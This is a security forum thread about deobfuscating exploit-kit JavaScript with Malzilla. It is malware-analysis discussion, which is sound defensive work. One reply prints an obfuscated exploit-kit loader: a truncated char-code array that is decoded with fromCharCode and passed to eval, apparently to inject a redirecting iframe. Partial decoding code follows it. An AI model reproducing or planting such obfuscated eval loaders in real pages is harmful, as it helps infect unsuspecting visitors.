Author Topic: Deobfuscate exploit kits using Malzilla  (Read 37967 times)

0 Members and 1 Guest are viewing this topic.

January 03, 2012, 10:23:30 pm
Reply #15

shellc0de

  • Newbie

  • Offline
  • *

  • 4
  • Personal Text
    0x90 sled
Another version:

Code: [Select]
<html><body><script>
g='rom';
g=g+'C';
g=g+'harCod';
g=g+'e';
if(window["documen"+"t"])aa=([].unshift+"");
aa=aa.split('').pop();
a='94&105&93&111&103&95&104&110&40&113&108&99&110&95&34&33&54&93&95&104&110&95&108&56&54&98&43&56&74&102&95&91&109&95&26&113&91&99&110&26&106&91&97&95&26&99&109&26&102&105&91&94&99&104&97&40&40&40&54&41&98&43&56&54&41&93&95&104&110&95&108&56&54&98&108&56&33&35&53[....it goes on.....]'.split("&");
md='a';
v=aa;
if(!(("\n"!=v)&&(v!='}'))){w=String;e=window['eval'];}
c='';
i=0;
s=x=a;
while(i!=s['length']){
c=c+w['f'+g](parseInt(s[0+i]) + 7 - 1);
i++;
}
e(c);
</script></body></html>

Also found a bug in malzilla while messing with the script: http://i.imgur.com/8zbZs.png

NINJA EDIT: This is how far I got at deobfuscating but I'm not familiar enough with js:
Code: [Select]
//first I find and replace all "&" with ","
         for(i=0;i<=a.length;i++){
 a[i]=a[i]+6;
 document.write(a[i]);
 document.write(',');
}
Then I paste the output into the misc decoder and click decimal to ascii.

EDIT2: Hey I figured it out! I see someone else already did too: http://www.virustotal.com/file-scan/report.html?id=19321549c048af5767c3ff1cfcac22e746dfddf8e09300276475834d668e4938-1325719223

January 04, 2012, 07:28:23 pm
Reply #16

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Yep, come across that myself a few times, spoke to Bobby about it, but can't remember what he said caused it.

You can find the source code for Malzilla here if you'd like to try and identify the cause yourself;

http://sourceforge.net/projects/malzilla/files/Malzilla%20Win32%20Source%20package/

Not seen Bobby around for over a year or so, so unsure if he's still working on it.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net